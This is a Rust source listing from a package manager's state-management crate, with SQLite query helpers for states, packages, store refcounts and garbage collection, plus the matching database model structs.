    let id_str = state_id.to_string();
    let rows = query(
        r#"
        SELECT
            sp.id           AS pkg_row_id,
            sp.state_id     AS state_id,
            pv.name         AS name,
            pv.version      AS version,
            pv.store_hash   AS hash,
            pv.size_bytes   AS size,
            sp.added_at     AS installed_at
        FROM state_packages sp
        JOIN package_versions pv ON pv.id = sp.package_version_id
        WHERE sp.state_id = ?1
        ORDER BY pv.name
        "#,
    )
    .bind(id_str)
    .fetch_all(&mut **tx)
    .await?;
    Ok(rows
        .into_iter()
        .map(|row| Package {
            id: row.get("pkg_row_id"),
            state_id: row.get("state_id"),
            name: row.get("name"),
            version: row.get("version"),
            hash: row.get("hash"),
            size: row.get("size"),
            installed_at: row.get("installed_at"),
            venv_path: None,
        })
        .collect())
}
/// All packages for a state (same as `get_state_packages` under v2 schema).
///
/// Kept as a separate entry point for schema-v1 compatibility.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_active_packages(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
) -> Result<Vec<Package>, Error> {
    get_state_packages(tx, state_id).await
}
/// Ensure a package version exists and add it to a state snapshot.
///
/// Two steps: upsert the `package_versions` row (refreshing hash/size on
/// conflict), then link it into `state_packages`. Returns the row id of the
/// new `state_packages` entry.
///
/// NOTE(review): the returned id comes from `last_insert_rowid()`, which
/// here reflects the `state_packages` INSERT because it is the last insert
/// executed on this connection — keep the statement order intact.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
    name: &str,
    version: &str,
    store_hash: &str,
    size: i64,
) -> Result<i64, Error> {
    let id_str = state_id.to_string();
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT INTO package_versions (name, version, store_hash, size_bytes, created_at)
        VALUES (?1, ?2, ?3, ?4, ?5)
        ON CONFLICT(name, version) DO UPDATE SET
            store_hash = excluded.store_hash,
            size_bytes = excluded.size_bytes
        "#,
    )
    .bind(name)
    .bind(version)
    .bind(store_hash)
    .bind(size)
    .bind(now)
    .execute(&mut **tx)
    .await?;
    query(
        r#"
        INSERT INTO state_packages (state_id, package_version_id, install_size_bytes, added_at)
        VALUES (?1,
                (SELECT id FROM package_versions WHERE name = ?2 AND version = ?3),
                ?4,
                ?5)
        "#,
    )
    .bind(&id_str)
    .bind(name)
    .bind(version)
    .bind(size)
    .bind(now)
    .execute(&mut **tx)
    .await?;
    let row = query("SELECT last_insert_rowid() as id")
        .fetch_one(&mut **tx)
        .await?;
    Ok(row.get("id"))
}
/// Remove a package version reference from a state snapshot.
///
/// Removes every version of `name` from the given state; the underlying
/// `package_versions` row (shared by other states) is left in place.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn remove_package(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
    name: &str,
) -> Result<(), Error> {
    let id_str = state_id.to_string();
    query(
        r#"
        DELETE FROM state_packages
        WHERE state_id = ?1
          AND package_version_id IN (SELECT id FROM package_versions WHERE name = ?2)
        "#,
    )
    .bind(id_str)
    .bind(name)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Ensure an archive CAS row exists (refcount starts at 0).
///
/// Idempotent: `INSERT OR IGNORE` leaves an existing row — including its
/// current refcount — untouched. Despite the `get_or_create` name, nothing
/// is returned beyond success.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_or_create_store_ref(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
    size: i64,
) -> Result<(), Error> {
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT OR IGNORE INTO cas_objects (hash, kind, size_bytes, created_at, ref_count)
        VALUES (?1, 'archive', ?2, ?3, 0)
        "#,
    )
    .bind(hash)
    .bind(size)
    .bind(now)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Increment archive refcount (no-op for an unknown hash).
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn increment_store_ref(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
) -> Result<(), Error> {
    query("UPDATE cas_objects SET ref_count = ref_count + 1 WHERE hash = ?1 AND kind = 'archive'")
        .bind(hash)
        .execute(&mut **tx)
        .await?;
    Ok(())
}
/// Decrement archive refcount (no floor applied; can go negative).
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn decrement_store_ref(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
) -> Result<(), Error> {
    query("UPDATE cas_objects SET ref_count = ref_count - 1 WHERE hash = ?1 AND kind = 'archive'")
        .bind(hash)
        .execute(&mut **tx)
        .await?;
    Ok(())
}
/// Force-set archive refcount (reconciliation helper).
///
/// The `ref_count <> ?1` guard skips the write when the value already
/// matches, so `rows_affected` (0 or 1) reports whether a correction
/// happened.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn set_store_ref_count(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
    count: i64,
) -> Result<u64, Error> {
    let res = query(
        "UPDATE cas_objects SET ref_count = ?1 WHERE hash = ?2 AND kind = 'archive' AND ref_count <> ?1",
    )
    .bind(count)
    .bind(hash)
    .execute(&mut **tx)
    .await?;
    Ok(res.rows_affected())
}
/// Fetch archive CAS rows with refcount <= 0 (garbage-collection
/// candidates).
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_unreferenced_items(
    tx: &mut Transaction<'_, Sqlite>,
) -> Result<Vec<StoreRef>, Error> {
    let rows = query(
        r#"
        SELECT hash, ref_count, size_bytes AS size, created_at
        FROM cas_objects
        WHERE kind = 'archive' AND ref_count <= 0
        "#,
    )
    .fetch_all(&mut **tx)
    .await?;
    Ok(rows
        .into_iter()
        .map(|row| StoreRef {
            hash: row.get("hash"),
            ref_count: row.get("ref_count"),
            size: row.get("size"),
            created_at: row.get("created_at"),
        })
        .collect())
}
/// Check whether a given state exists.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn state_exists(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
) -> Result<bool, Error> {
    let id_str = state_id.to_string();
    let row = query("SELECT 1 FROM states WHERE id = ?1")
        .bind(id_str)
        .fetch_optional(&mut **tx)
        .await?;
    Ok(row.is_some())
}
/// List state IDs ordered by creation time (desc, i.e. newest first).
///
/// # Errors
///
/// Returns an error if the database operation fails, or if a stored ID is
/// not a valid UUID.
pub async fn list_states(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<StateId>, Error> {
    let rows = query("SELECT id FROM states ORDER BY created_at DESC")
        .fetch_all(&mut **tx)
        .await?;
    let mut result = Vec::with_capacity(rows.len());
    for r in rows {
        let id: String = r.get("id");
        // Parse eagerly so a corrupt row surfaces as an error, not a panic.
        result.push(
            uuid::Uuid::parse_str(&id)
                .map_err(|e| Error::internal(format!("invalid state ID: {e}")))?,
        );
    }
    Ok(result)
}
/// List unique package names present in a given state, ordered by name.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_state_package_names(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
) -> Result<Vec<String>, Error> {
    let id_str = state_id.to_string();
    let rows = query(
        r#"
        SELECT DISTINCT pv.name
        FROM state_packages sp
        JOIN package_versions pv ON pv.id = sp.package_version_id
        WHERE sp.state_id = ?1
        ORDER BY pv.name
        "#,
    )
    .bind(id_str)
    .fetch_all(&mut **tx)
    .await?;
    Ok(rows.into_iter().map(|r| r.get("name")).collect())
}
/// List all states with metadata, newest first.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_states(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<State>, Error> {
    let rows = query(
        r#"
        SELECT id, parent_id, created_at, operation, success, rollback_of, pruned_at
        FROM states
        ORDER BY created_at DESC
        "#,
    )
    .fetch_all(&mut **tx)
    .await?;
    Ok(rows
        .into_iter()
        .map(|row| State {
            id: row.get("id"),
            parent_id: row.get("parent_id"),
            created_at: row.get("created_at"),
            operation: row.get("operation"),
            success: row.get("success"),
            rollback_of: row.get("rollback_of"),
            pruned_at: row.get("pruned_at"),
        })
        .collect())
}
/// States eligible for cleanup by age and retention count
///
/// A state is a cleanup candidate only if it is *all* of:
/// - outside the `keep_count` newest states,
/// - older than `cutoff_time` (unix seconds, exclusive),
/// - not the currently active state,
/// - marked successful (failed states are excluded here — presumably they
///   are handled by a different path; TODO(review): confirm).
///
/// Results are ordered oldest-first so callers can delete in creation order.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_for_cleanup(
    tx: &mut Transaction<'_, Sqlite>,
    keep_count: usize,
    cutoff_time: i64,
) -> Result<Vec<String>, Error> {
    let rows = query(
        r#"
        SELECT id FROM states
        WHERE id NOT IN (
            SELECT id FROM states ORDER BY created_at DESC LIMIT ?1
        )
        AND created_at < ?2
        AND id NOT IN (SELECT state_id FROM active_state WHERE id = 1)
        AND success = 1
        ORDER BY created_at ASC
        "#,
    )
    // SQLite binds i64; converting from usize can only fail on exotic platforms.
    .bind(i64::try_from(keep_count).map_err(|e| Error::internal(e.to_string()))?)
    .bind(cutoff_time)
    .fetch_all(&mut **tx)
    .await?;
    Ok(rows.into_iter().map(|r| r.get("id")).collect())
}
/// Delete a state row
///
/// Removes only the `states` row itself; rows referencing it are assumed
/// to be handled by the schema or by callers — TODO(review): confirm the
/// foreign-key behavior.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn delete_state(tx: &mut Transaction<'_, Sqlite>, state_id: &str) -> Result<(), Error> {
    let stmt = query("DELETE FROM states WHERE id = ?1").bind(state_id);
    stmt.execute(&mut **tx).await?;
    Ok(())
}
/// Alias for `get_states_for_cleanup`
///
/// Kept so existing callers using the older name keep compiling; it simply
/// delegates with identical semantics.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_to_cleanup(
    tx: &mut Transaction<'_, Sqlite>,
    keep_count: usize,
    cutoff_time: i64,
) -> Result<Vec<String>, Error> {
    get_states_for_cleanup(tx, keep_count, cutoff_time).await
}
/// Strict retention: keep only N newest states
///
/// Unlike [`get_states_for_cleanup`] there is no age cutoff: everything
/// outside the `keep_count` newest states is a candidate, except the active
/// state and unsuccessful states. Results are ordered oldest-first.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_for_cleanup_strict(
    tx: &mut Transaction<'_, Sqlite>,
    keep_count: usize,
) -> Result<Vec<String>, Error> {
    let rows = query(
        r#"
        SELECT id FROM states
        WHERE id NOT IN (
            SELECT id FROM states ORDER BY created_at DESC LIMIT ?1
        )
        AND id NOT IN (SELECT state_id FROM active_state WHERE id = 1)
        AND success = 1
        ORDER BY created_at ASC
        "#,
    )
    .bind(i64::try_from(keep_count).map_err(|e| Error::internal(e.to_string()))?)
    .fetch_all(&mut **tx)
    .await?;
    Ok(rows.into_iter().map(|r| r.get("id")).collect())
}
/// Alias for `get_unreferenced_items` (kept for callers)
///
/// Thin delegation preserved for backwards-compatible naming.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_unreferenced_store_items(
    tx: &mut Transaction<'_, Sqlite>,
) -> Result<Vec<StoreRef>, Error> {
    get_unreferenced_items(tx).await
}
/// Delete archive CAS rows for given hashes
///
/// Issues one DELETE per hash rather than building a dynamic `IN (...)`
/// list; all deletes share the surrounding transaction.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn delete_unreferenced_store_items(
    tx: &mut Transaction<'_, Sqlite>,
    hashes: &[String],
) -> Result<(), Error> {
    for digest in hashes.iter() {
        query("DELETE FROM cas_objects WHERE hash = ?1 AND kind = 'archive'")
            .bind(digest)
            .execute(&mut **tx)
            .await?;
    }
    Ok(())
}
/// Fetch all archive CAS rows
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_store_refs(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<StoreRef>, Error> {
    let rows = query(
        r#"SELECT hash, ref_count, size_bytes AS size, created_at FROM cas_objects WHERE kind = 'archive'"#,
    )
    .fetch_all(&mut **tx)
    .await?;
    // One `StoreRef` per archive row; no filtering applied here.
    let mut refs = Vec::with_capacity(rows.len());
    for record in rows {
        refs.push(StoreRef {
            hash: record.get("hash"),
            ref_count: record.get("ref_count"),
            size: record.get("size"),
            created_at: record.get("created_at"),
        });
    }
    Ok(refs)
}
/// Map archive hash -> last reference timestamp
///
/// The timestamp is the newest `states.created_at` among states that still
/// reference the archive; hashes with no matching state simply do not appear.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_last_ref_map(
    tx: &mut Transaction<'_, Sqlite>,
) -> Result<HashMap<String, i64>, Error> {
    let rows = query(
        r#"
        SELECT pv.store_hash AS hash, COALESCE(MAX(s.created_at), 0) AS last_ref
        FROM state_packages sp
        JOIN package_versions pv ON pv.id = sp.package_version_id
        JOIN states s ON s.id = sp.state_id
        GROUP BY pv.store_hash
        "#,
    )
    .fetch_all(&mut **tx)
    .await?;
    // Collect (hash, last_ref) pairs straight into the map.
    Ok(rows
        .into_iter()
        .map(|row| (row.get("hash"), row.get("last_ref")))
        .collect())
}
/// Insert archive eviction log entry
///
/// Uses `INSERT OR REPLACE`, so evicting the same hash again overwrites the
/// earlier log row (only the latest eviction per hash is retained).
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn insert_package_eviction(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
    size: i64,
    reason: Option<&str>,
) -> Result<(), Error> {
    // Eviction time is recorded as the current unix timestamp (seconds).
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT OR REPLACE INTO cas_evictions (hash, kind, evicted_at, size_bytes, reason)
        VALUES (?1, 'archive', ?2, ?3, ?4)
        "#,
    )
    .bind(hash)
    .bind(now)
    .bind(size)
    .bind(reason)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Insert file eviction log entry
///
/// Same shape as [`insert_package_eviction`] but records kind 'file'
/// instead of 'archive'.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn insert_file_object_eviction(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
    size: i64,
    reason: Option<&str>,
) -> Result<(), Error> {
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT OR REPLACE INTO cas_evictions (hash, kind, evicted_at, size_bytes, reason)
        VALUES (?1, 'file', ?2, ?3, ?4)
        "#,
    )
    .bind(hash)
    .bind(now)
    .bind(size)
    .bind(reason)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// List package names that depend on the given package name across all versions
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_dependents(
    tx: &mut Transaction<'_, Sqlite>,
    package_name: &str,
) -> Result<Vec<String>, Error> {
    let rows = query(
        r#"
        SELECT DISTINCT pv.name
        FROM package_versions pv
        JOIN package_deps d ON d.package_version_id = pv.id
        WHERE d.dep_name = ?1
        ORDER BY pv.name
        "#,
    )
    .bind(package_name)
    .fetch_all(&mut **tx)
    .await?;
    // Distinct, name-ordered dependents straight from the query.
    let mut dependents = Vec::with_capacity(rows.len());
    for record in rows {
        dependents.push(record.get("name"));
    }
    Ok(dependents)
}
/// Detailed state list (alias for `get_all_states`)
///
/// Delegation kept so callers using the older name continue to work.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn list_states_detailed(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<State>, Error> {
    get_all_states(tx).await
}
/// States older than cutoff timestamp
///
/// Returns IDs of all states created strictly before `cutoff`, oldest first.
/// Note: unlike the cleanup queries, this does not exclude the active state.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_states_older_than(
    tx: &mut Transaction<'_, Sqlite>,
    cutoff: i64,
) -> Result<Vec<String>, Error> {
    let ids: Vec<String> =
        query("SELECT id FROM states WHERE created_at < ? ORDER BY created_at ASC")
            .bind(cutoff)
            .fetch_all(&mut **tx)
            .await?
            .into_iter()
            .map(|record| record.get("id"))
            .collect();
    Ok(ids)
}
/// Mark states as pruned (except the active one)
///
/// Sets `pruned_at = ts` on each listed state that is not already pruned and
/// is not the active state. Returns how many rows were actually updated.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn mark_pruned_states(
    tx: &mut Transaction<'_, Sqlite>,
    ids: &[String],
    ts: i64,
    active_id: &str,
) -> Result<usize, Error> {
    let mut marked = 0usize;
    // Skip the active state up front; the WHERE clause protects already-pruned rows.
    for candidate in ids.iter().filter(|id| id.as_str() != active_id) {
        let outcome =
            query("UPDATE states SET pruned_at = ?1 WHERE id = ?2 AND pruned_at IS NULL")
                .bind(ts)
                .bind(candidate)
                .execute(&mut **tx)
                .await?;
        marked += usize::from(outcome.rows_affected() > 0);
    }
    Ok(marked)
}
/// Clear pruned marker for a state
///
/// Resets `pruned_at` to NULL; a no-op if the state was not pruned.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn unprune_state(tx: &mut Transaction<'_, Sqlite>, id: &str) -> Result<(), Error> {
    let stmt = query("UPDATE states SET pruned_at = NULL WHERE id = ?1").bind(id);
    stmt.execute(&mut **tx).await?;
    Ok(())
}
/// Fetch parent state ID if any
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_parent_state_id(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
) -> Result<Option<StateId>, Error> {
let id_str = state_id.to_string();
let row = query("SELECT parent_id FROM states WHERE id = ?1")
.bind(id_str)
.fetch_optional(&mut **tx)
.await?;
match row {
Some(r) => {
let parent: Option<String> = r.get("parent_id");
if let Some(p) = parent {
let id = uuid::Uuid::parse_str(&p)
.map_err(|e| Error::internal(format!("invalid parent state ID: {e}")))?;
Ok(Some(id))
} else {
Ok(None)
}
}
None => Ok(None),
}
}
/// Legacy helper: record package files for directory entries (no-op for new schema)
///
/// Records a bare path entry under the (name, version) package, with an empty
/// file hash. Directories get mode 0, regular files a default of 0o644.
///
/// NOTE(review): if the (name, version) pair is missing from
/// `package_versions`, the scalar subquery yields NULL for
/// `package_version_id`; whether the row is then rejected or silently
/// inserted depends on schema constraints — TODO confirm.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package_file(
    tx: &mut Transaction<'_, Sqlite>,
    _state_id: &StateId,
    package_name: &str,
    package_version: &str,
    file_path: &str,
    is_directory: bool,
) -> Result<(), Error> {
    let mode = if is_directory { 0 } else { 0o644 };
    query(
        r#"
        INSERT OR IGNORE INTO package_files
            (package_version_id, file_hash, rel_path, mode, uid, gid, mtime)
        VALUES (
            (SELECT id FROM package_versions WHERE name = ?1 AND version = ?2),
            '', ?3, ?4, 0, 0, NULL
        )
        "#,
    )
    .bind(package_name)
    .bind(package_version)
    .bind(file_path)
    .bind(i64::from(mode))
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Fetch package file paths for a given version
///
/// The lookup keys on (name, version) only; the `_state_id` parameter is
/// retained for interface compatibility and is ignored.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_files(
    tx: &mut Transaction<'_, Sqlite>,
    _state_id: &StateId,
    package_name: &str,
    package_version: &str,
) -> Result<Vec<String>, Error> {
    let rows = query(
        r#"
        SELECT pf.rel_path
        FROM package_files pf
        JOIN package_versions pv ON pv.id = pf.package_version_id
        WHERE pv.name = ?1 AND pv.version = ?2
        ORDER BY pf.rel_path
        "#,
    )
    .bind(package_name)
    .bind(package_version)
    .fetch_all(&mut **tx)
    .await?;
    let mut paths = Vec::with_capacity(rows.len());
    for record in rows {
        paths.push(record.get("rel_path"));
    }
    Ok(paths)
}
/// Fetch package files ensuring version is present in state
///
/// First verifies that the (name, version) pair is recorded in `state_id`;
/// if not, returns an empty list rather than the global file list.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_files_with_inheritance(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
    package_name: &str,
    package_version: &str,
) -> Result<Vec<String>, Error> {
    let membership = query(
        r#"
        SELECT 1
        FROM state_packages sp
        JOIN package_versions pv ON pv.id = sp.package_version_id
        WHERE sp.state_id = ?1 AND pv.name = ?2 AND pv.version = ?3
        LIMIT 1
        "#,
    )
    .bind(state_id.to_string())
    .bind(package_name)
    .bind(package_version)
    .fetch_optional(&mut **tx)
    .await?;
    if membership.is_none() {
        // The version is not part of this state: report no files.
        return Ok(Vec::new());
    }
    get_package_files(tx, state_id, package_name, package_version).await
}
/// Package files for the active state
///
/// Resolves the currently active state and delegates to
/// [`get_package_files`].
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_active_package_files(
    tx: &mut Transaction<'_, Sqlite>,
    package_name: &str,
    package_version: &str,
) -> Result<Vec<String>, Error> {
    let current = get_active_state(tx).await?;
    get_package_files(tx, &current, package_name, package_version).await
}
/// Remove package files for a given version
///
/// Deletes every `package_files` row belonging to the (name, version)
/// package. The `_state_id` parameter is retained for interface
/// compatibility and is ignored — the delete is global to the version.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn remove_package_files(
    tx: &mut Transaction<'_, Sqlite>,
    _state_id: &StateId,
    package_name: &str,
    package_version: &str,
) -> Result<(), Error> {
    query(
        r#"
        DELETE FROM package_files
        WHERE package_version_id = (SELECT id FROM package_versions WHERE name = ?1 AND version = ?2)
        "#,
    )
    .bind(package_name)
    .bind(package_version)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Insert GC run entry
///
/// Appends a row to `gc_runs` with scope fixed to 'both' and the current
/// unix timestamp; `notes` is always NULL here.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn insert_gc_log(
    tx: &mut Transaction<'_, Sqlite>,
    items_removed: i64,
    space_freed: i64,
) -> Result<(), Error> {
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT INTO gc_runs (run_at, scope, items_removed, bytes_freed, notes)
        VALUES (?1, 'both', ?2, ?3, NULL)
        "#,
    )
    .bind(now)
    .bind(items_removed)
    .bind(space_freed)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Add package with venv path (venv ignored in v2 schema)
///
/// Compatibility shim: the `_venv_path` argument is discarded and the call
/// delegates to [`add_package`] unchanged. Returns the package row ID.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package_with_venv(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
    name: &str,
    version: &str,
    store_hash: &str,
    size: i64,
    _venv_path: Option<&str>,
) -> Result<i64, Error> {
    add_package(tx, state_id, name, version, store_hash, size).await
}
/// Venv path lookup (always None now)
///
/// The v2 schema no longer stores venv paths; this stub always returns
/// `Ok(None)` without touching the database.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_venv_path(
    _tx: &mut Transaction<'_, Sqlite>,
    _state_id: &StateId,
    _package_name: &str,
    _package_version: &str,
) -> Result<Option<String>, Error> {
    Ok(None)
}
/// Packages with venvs (empty under v2 schema)
///
/// Stub kept for interface compatibility; always returns an empty list.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_packages_with_venvs(
    _tx: &mut Transaction<'_, Sqlite>,
    _state_id: &StateId,
) -> Result<Vec<(String, String, String)>, Error> {
    Ok(Vec::new())
}
/// Update venv path (no-op)
///
/// Stub kept for interface compatibility; performs no database work.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn update_package_venv_path(
    _tx: &mut Transaction<'_, Sqlite>,
    _state_id: &StateId,
    _package_name: &str,
    _package_version: &str,
    _venv_path: Option<&str>,
) -> Result<(), Error> {
    Ok(())
}
/// Record package mapping (now writes to `package_versions`)
///
/// Upsert keyed on (name, version): a fresh row is inserted with
/// `size_bytes = 0`; on conflict only `store_hash` and `package_hash` are
/// refreshed, leaving the original `created_at` and size intact.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package_map(
    tx: &mut Transaction<'_, Sqlite>,
    name: &str,
    version: &str,
    store_hash: &str,
    package_hash: Option<&str>,
) -> Result<(), Error> {
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT INTO package_versions (name, version, store_hash, package_hash, size_bytes, created_at)
        VALUES (?1, ?2, ?3, ?4, 0, ?5)
        ON CONFLICT(name, version) DO UPDATE SET
            store_hash = excluded.store_hash,
            package_hash = excluded.package_hash
        "#,
    )
    .bind(name)
    .bind(version)
    .bind(store_hash)
    .bind(package_hash)
    .bind(now)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Lookup store hash by name+version
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_hash(
    tx: &mut Transaction<'_, Sqlite>,
    name: &str,
    version: &str,
) -> Result<Option<String>, Error> {
    let hash = query("SELECT store_hash FROM package_versions WHERE name = ?1 AND version = ?2")
        .bind(name)
        .bind(version)
        .fetch_optional(&mut **tx)
        .await?
        .map(|record| record.get("store_hash"));
    Ok(hash)
}
/// Lookup store hash by package archive hash
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_store_hash_for_package_hash(
    tx: &mut Transaction<'_, Sqlite>,
    package_hash: &str,
) -> Result<Option<String>, Error> {
    let hash = query("SELECT store_hash FROM package_versions WHERE package_hash = ?1")
        .bind(package_hash)
        .fetch_optional(&mut **tx)
        .await?
        .map(|record| record.get("store_hash"));
    Ok(hash)
}
/// Remove package mapping entry
///
/// Deletes the `package_versions` row keyed by (name, version); a no-op if
/// no such row exists.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn remove_package_map(
    tx: &mut Transaction<'_, Sqlite>,
    name: &str,
    version: &str,
) -> Result<(), Error> {
    let stmt = query("DELETE FROM package_versions WHERE name = ?1 AND version = ?2")
        .bind(name)
        .bind(version);
    stmt.execute(&mut **tx).await?;
    Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/models.rs | crates/state/src/models.rs | //! Database models for state management
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use sps2_hash::Hash;
use sps2_types::{StateId, Version};
use sqlx::FromRow;
/// A system state record
///
/// Mirrors one row of the `states` table.
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct State {
    /// State UUID, stored in string form.
    pub id: String,
    /// Parent state UUID string; `None` for a root state.
    pub parent_id: Option<String>,
    /// Creation time as a unix timestamp in seconds.
    pub created_at: i64,
    /// Operation that produced this state (e.g. "install").
    pub operation: String,
    /// Whether the operation completed successfully.
    pub success: bool,
    /// When set, the ID of the state this one rolls back.
    pub rollback_of: Option<String>,
    /// Unix timestamp when the state was marked pruned; `None` if not pruned.
    pub pruned_at: Option<i64>,
}
impl State {
    /// Convert to `StateId`
    ///
    /// # Panics
    ///
    /// Panics if the stored ID is not a valid UUID.
    #[must_use]
    pub fn state_id(&self) -> StateId {
        uuid::Uuid::parse_str(&self.id).expect("valid UUID in database")
    }
    /// Get creation timestamp
    ///
    /// # Panics
    ///
    /// Panics if the stored timestamp is not valid.
    #[must_use]
    pub fn timestamp(&self) -> DateTime<Utc> {
        // `created_at` is interpreted as whole seconds (nanosecond part 0).
        DateTime::from_timestamp(self.created_at, 0).expect("valid timestamp in database")
    }
}
/// An installed package record
///
/// Mirrors one installed-package row tied to a specific state.
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct Package {
    /// Database row ID.
    pub id: i64,
    /// Owning state UUID, in string form.
    pub state_id: String,
    /// Package name.
    pub name: String,
    /// Package version string; parse via [`Package::version`].
    pub version: String,
    /// Store (content) hash string; parse via [`Package::hash`].
    pub hash: String,
    /// Installed size in bytes.
    pub size: i64,
    /// Installation time as a unix timestamp.
    pub installed_at: i64,
    /// Legacy venv path — newer query paths ignore this field
    /// (see the venv helper stubs in `queries`).
    pub venv_path: Option<String>,
}
impl Package {
    /// Parse the version
    ///
    /// # Panics
    ///
    /// Panics if the stored version string is not valid.
    #[must_use]
    pub fn version(&self) -> Version {
        Version::parse(&self.version).expect("valid version in database")
    }
    /// Parse the hash
    ///
    /// # Panics
    ///
    /// Panics if the stored hash string is not valid.
    #[must_use]
    pub fn hash(&self) -> Hash {
        Hash::from_hex(&self.hash).expect("valid hash in database")
    }
}
/// A package dependency record
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct Dependency {
    /// Database row ID.
    pub id: i64,
    /// Row ID of the depending package.
    pub package_id: i64,
    /// Name of the package depended upon.
    pub dep_name: String,
    /// Version-constraint specification string.
    pub dep_spec: String,
    /// Dependency kind (stored as a string in the database).
    pub dep_kind: String,
}
/// A store reference count record
///
/// One content-addressed store entry with its current reference count.
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct StoreRef {
    /// Content hash string; parse via [`StoreRef::hash`].
    pub hash: String,
    /// Number of states currently referencing this entry.
    pub ref_count: i64,
    /// Size in bytes.
    pub size: i64,
    /// Creation time as a unix timestamp.
    pub created_at: i64,
}
impl StoreRef {
    /// Parse the hash
    ///
    /// # Panics
    ///
    /// Panics if the stored hash string is not valid.
    #[must_use]
    pub fn hash(&self) -> Hash {
        Hash::from_hex(&self.hash).expect("valid hash in database")
    }
}
/// Package reference for state transitions
///
/// In-memory handle (not a database row) pairing a package identity with
/// the state it belongs to and its store hash/size.
#[derive(Debug, Clone)]
pub struct PackageRef {
    pub state_id: uuid::Uuid,
    pub package_id: sps2_resolver::PackageId,
    pub hash: String,
    pub size: i64,
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
